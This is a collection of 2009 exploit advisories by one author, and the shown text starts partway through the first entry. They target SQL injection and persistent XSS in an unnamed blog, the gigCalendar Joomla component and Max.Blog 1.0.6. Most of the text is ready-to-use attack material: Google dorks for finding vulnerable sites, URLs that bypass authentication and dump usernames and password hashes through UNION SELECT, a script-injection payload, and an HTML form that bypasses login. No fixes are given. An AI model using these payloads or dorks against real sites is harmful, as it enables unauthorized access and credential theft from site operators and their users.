[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php

This blog is entirely vulnerable to SQL injection. The following is the vulnerable query, which can be used to bypass authentication: the login is a single password lookup, so any condition that makes the WHERE clause true returns a user row.

In jobs.php:

    if ($_GET[j] == "login"){
        if ($blog->login($_GET[p])){
            $_SESSION[loggedin] = "ok";
            $_SESSION[userID] = $blog->userID;
            echo "Password found. Loging in...";

In ritsBlogAdmin.class.php:

    function login($password){
        global $db;
        $sql = "select * from users where secretWord = '$password'";
        ...
    }

- [B] XSS Persistent

[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php

In jobs.php:

    if ($_POST[j] == "addComment"){
        echo $blog->addComment($_POST[id], $_POST[name], $_POST[body]);
    }

In ritsBlogAdmin.class.php:

    function addComment($id, $name, $body){
        global $db;
        $sql = "INSERT INTO comments (name, postID, date, text) VALUES('" . addslashes($name) . "'," . $id . ",NOW(),'" . addslashes($body) . "')";
        ...
    }

addslashes() only escapes quotes for the query; nothing HTML-encodes $name or $body before they are stored and later displayed, so a script tag in either field survives and runs for every visitor of the post.

*

[+] Code

- [A] SQL Injection

http://www.site.com/path/blogAdmin/jobs.php?j=login&p=1'or'1'='1

- [B] XSS Persistent

Use the comment form on index.php, or send the following values by POST:

?j=addComment&id=54&name=myname&body=<script>alert('XSS');</script>

or

?j=addComment&id=54&name=<script>alert('XSS');</script>&body=body

*

[+] Fix

No fix.

*

-- Salvatore "drosophila" Fresta
gigCalendar Joomla Component 1.0 SQL Injection
*** Salvatore drosophila Fresta ***

Application: gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version: gigCalendar 1.0
Bug: * SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off
File affected: banddetails.php

This bug allows a guest to view the username and password of a registered user.

http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL from jos_users%23

*

-- Salvatore drosophila Fresta
gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta ***

Application: gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version: gigCalendar 1.0
Bug: * SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off
File affected: banddetails.php

This bug allows a guest to view the username and password of a registered user.

http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1' UNION ALL SELECT 1,2,3,4,5,concat('username: ', username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23

*

-- Salvatore drosophila Fresta
gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta ***

Application: gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version: gigCalendar 1.0
Bug: * SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

*

- BUGS

SQL Injection:

Requisites: magic_quotes_gpc = off
File affected: venuedetails.php

This bug allows a guest to view the username and password of a registered user.

http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_venues_id=-1' UNION ALL SELECT 1,concat('username: ', username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23

*

-- Salvatore drosophila Fresta
Max.Blog = 1.0.6 (offline_auth.php) Offline Authentication Bypass
### Salvatore drosophila Fresta ###

Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog = 1.0.6
Bug: * Offline Authentication Bypass
Exploitation: Remote
Dork: intext:Powered by Max.Blog
Date: 27 Jan 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

- BUGS

Offline Authentication Bypass Exploit:

Requisites: magic quotes = off
File affected: offline_auth.php

This bug allows a guest to bypass the offline authentication service by means of an SQL Injection vulnerability.

- CODE

html
head
title Salvatore drosophila Fresta - Max.Blog = 1.0.6 Offline Authentication Bypass Exploit /title
/head
body
form action=http://www.site.com/path/offline_auth.php; method=POST
input type=text name=username value=admin'# size=15
input type=hidden name=password
input type=submit value=Go!
/form
/body
/html

-- Salvatore drosophila Fresta
Max.Blog = 1.0.6 (show_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta ###

Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog = 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:Powered by Max.Blog
Date: 20 Jan 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

- BUGS

SQL Injection:

File affected: show_post.php

This bug allows a guest to view the username and password (md5) of the registered user with the specified id (usually 1 for the admin).

http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

-- Salvatore drosophila Fresta
Max.Blog = 1.0.6 (submit_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta ###

Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog = 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:Powered by Max.Blog
Date: 27 Jan 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com

- BUGS

SQL Injection:

Requisites: magic quotes = off
File affected: submit_post.php

This bug allows a registered user to view the username and password (md5) of the registered user with the specified id (usually 1 for the admin).

http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23

-- Salvatore drosophila Fresta